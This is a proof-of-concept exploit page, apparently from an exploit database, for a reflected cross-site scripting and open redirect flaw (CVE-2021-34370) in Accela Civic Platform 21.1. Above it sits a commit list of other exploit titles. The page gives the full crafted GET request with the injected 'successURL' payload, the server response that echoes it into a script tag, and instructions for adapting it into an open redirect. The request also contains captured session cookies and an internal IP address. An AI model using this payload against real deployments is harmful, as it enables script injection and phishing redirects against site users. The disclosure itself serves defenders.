fe5d7c9048
16 changes to exploits/shellcodes Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR) GLPI 9.4.5 - Remote Code Execution (RCE) COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS) Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated) Small CRM 3.0 - 'Authentication Bypass' SQL Injection TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
74 lines
No EOL
2.4 KiB
Text
74 lines
No EOL
2.4 KiB
Text
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
|
|
# Software Link: https://www.accela.com/civic-platform/
|
|
# Version: <= 21.1
|
|
# Author: Abdulazeez Alaseeri
|
|
# Tested on: JBoss server/windows
|
|
# Type: Web App
|
|
# Date: 07/06/2021
|
|
# CVE-2021-34370
|
|
|
|
|
|
|
|
================================================================
|
|
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
|
|
================================================================
|
|
|
|
|
|
================================================================
|
|
Request Heeaders start
|
|
================================================================
|
|
|
|
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
|
|
|
|
Host: Hidden
|
|
|
|
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
|
|
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
|
|
Accept-Language: en-US,en;q=0.5
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
Te: trailers
|
|
|
|
Connection: close
|
|
|
|
================================================================
|
|
Request Heeaders end
|
|
================================================================
|
|
|
|
|
|
|
|
================================================================
|
|
Response Heeaders start
|
|
================================================================
|
|
HTTP/1.1 200 OK
|
|
|
|
Connection: close
|
|
|
|
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
|
|
|
|
X-XSS-Protection: 0
|
|
|
|
Content-Type: text/html;charset=ISO-8859-1
|
|
|
|
Content-Length: 73
|
|
|
|
Date: Tue, 08 Jun 2021 10:41:59 GMT
|
|
|
|
|
|
|
|
<script type='text/javascript'>document.location=''^alert`1`^''</script>
|
|
|
|
================================================================
|
|
Response Heeaders end
|
|
================================================================
|
|
|
|
Payload: %27^alert`1`^%27
|
|
|
|
for open redirect, replace the payload to a valid website. |